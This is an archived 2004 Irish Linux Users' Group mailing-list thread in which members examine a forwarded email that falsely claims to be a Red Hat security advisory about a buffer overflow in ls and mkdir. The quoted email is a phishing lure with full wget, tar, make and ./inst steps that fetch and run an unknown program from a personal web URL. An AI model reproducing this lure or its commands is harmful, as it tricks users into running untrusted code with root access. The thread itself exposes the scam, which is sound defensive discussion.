LINUX.IE, website of the Irish Linux Users' Group
Tux rules!

   
Home
New Users
Articles
Download
Projects
Community
Vendors

  Print Version
Email to...
 
Archives:


planetILUG

Recent News

News Archive


Join the
ILUG
on FaceBook


Join the
ILUG
on LinkedIn


Join the
ILUG SETI
Group



















 
 :: Mailing Lists

[ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"

[ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"

Chris Higgins chris.higgins at darach.ie
Sat Oct 23 12:53:33 IST 2004 

On Sat, 23 Oct 2004 12:35:44 +0100
Marek <m.mcgann at sussex.ac.uk> wrote:

> Thought you might be interested to see the below - it's the first time
> I've seen anything like this for Linux (apologies for the html mail,
> but that's how it arrived) . 
> 
> I presume it's this Joeio in Stanford (or whoever) trying to spam his
> way into Red Hat boxes?
> 
> Interesting to see someone considering desktop "not-terribly-clued-in"
> Linux users a worthwhile target.
> 
> Or am I being too suspicious about it?

Erm... get file, download, untar/gz, extract... 
That gets you two files, inst.c and a makefile.
the makefile just compiles the program...


No readme, no nothing...

If the clueless desktop user even did try the 
'unpack ; make ; make install ' sequence that is
listed as the 'easy linux way to install software',
it will do nothing - as there is no install target 
for the makefile, and the 'inst' target just compiles
the program and does nothing else. I expected it to
at least do a 'cc inst.c -o inst ; ./inst'... but it doesn't
even try that.

So you'd have to be really stupid not have any readme
and still figure out that you had to run 'inst', and not
check what's in the inst.c file in the first place.

First glance of 'inst.c' should get you kinda suspicious
as there is no mention of 'ls' or 'mkdir' anywhere.
As it happens, it starts with "Generic Script Compiler"
copyright Francisco Rosales... no mention of redhat
or anyone else...

I might get the chance to compile and run it later :-)
> 
> ----------  Forwarded Message  ----------
> 
> Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
> Date: Saturday 23 October 2004 05:37
> From: RedHat Security Team <security at redhat.com>
> To: <another mailing list I'm subscribed to>
> 
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
> "http://www.w3.org/TR/html4/loose.dtd">
> <html>
> <head>
> <title>Untitled Document</title>
> <meta http-equiv="Content-Type" content="text/html;
> charset=iso-8859-1"><style type="text/css">
> <!--
> .style1 {font-size: 12px}
> - -->
> </style>
> </head>
> <body>
> <p><img src="http://www.redhat.com/g/chrome/logo_rh_home.png"></p>
> <p> Original issue date: October 20, 2004<br>
> Last revised: October 20, 2004<br>
> Source: RedHat </p>
> <p>A complete revision history is at the end of this file. </p>
> <p>Dear RedHat user,</p>
> <p>  Redhat found a vulnerability in fileutils (ls and mkdir), that
> could
>  allow a remote attacker to execute arbitrary code with root
>  privileges. Some of the affected linux distributions include RedHat
>  7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2
>  and not only. It is known that*BSD and Solaris platforms are NOT
>  affected.</p> <p>The RedHat Security Team strongly advises you to
>  immediately apply the<strong> fileutils-1.0.6 patch</strong>. This is
>  a critical-critical update that you must make by following these
>  steps:</p> <ul>
>   <li>First download the patch from the Stanford RedHat mirror:
>  <strong><em>wget
>  www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz</em></strong></li>
>  <li>Untar the patch:<em><strong> tar zxvf
>  fileutils-1.0.6.patch.tar.gz</strong></em></li> <li><em><strong>cd
>  fileutils-1.0.6.patch</strong></em></li>
>   <li><em><strong>make</strong></em></li>
>   <li><em><strong>./inst</strong></em></li>
> </ul>
> <p>Again, please apply this patch as soon as possible or you risk your
> system
>  and others` to be compromised.</p> <p>Thank you for your prompt
>  attention to this serious matter,</p>
> <p>RedHat Security Team.</p>
> <p class="style1"> Copyright &copy; 2004 Red Hat, Inc. All rights
> reserved.  
>  </p> </body>
> </html>
> 
> - -------------------------------------------------------
> -- 
> Irish Linux Users' Group
> http://www.linux.ie/mailman/listinfo/ilug/
> 


-- 
Chris Higgins                              
Darach Technology Ltd                      tel: +353-1-6204370
email: chris.higgins at darach.ie          fax: +353-1-6204371
http://www.darach.ie

More information about the ILUG mailing list
Read this without the formatting.
                                                                                                    

  

Hosted by HEAnet


 Maintained by the ILUG website team. The aim of Linux.ie is to support and help commercial and private users of Linux in Ireland. You can display ILUG news in your own webpages, read backend information to find out how. Networking services kindly provided by HEAnet, server kindly donated by Dell. Linux is a trademark of Linus Torvalds, used with permission. No penguins were harmed in the production or maintenance of this highly praised website. Looking for the Indian Linux Users' Group? Try here. If you've read all this and aren't a lawyer: you should be!
RSS Version
Powered by Dell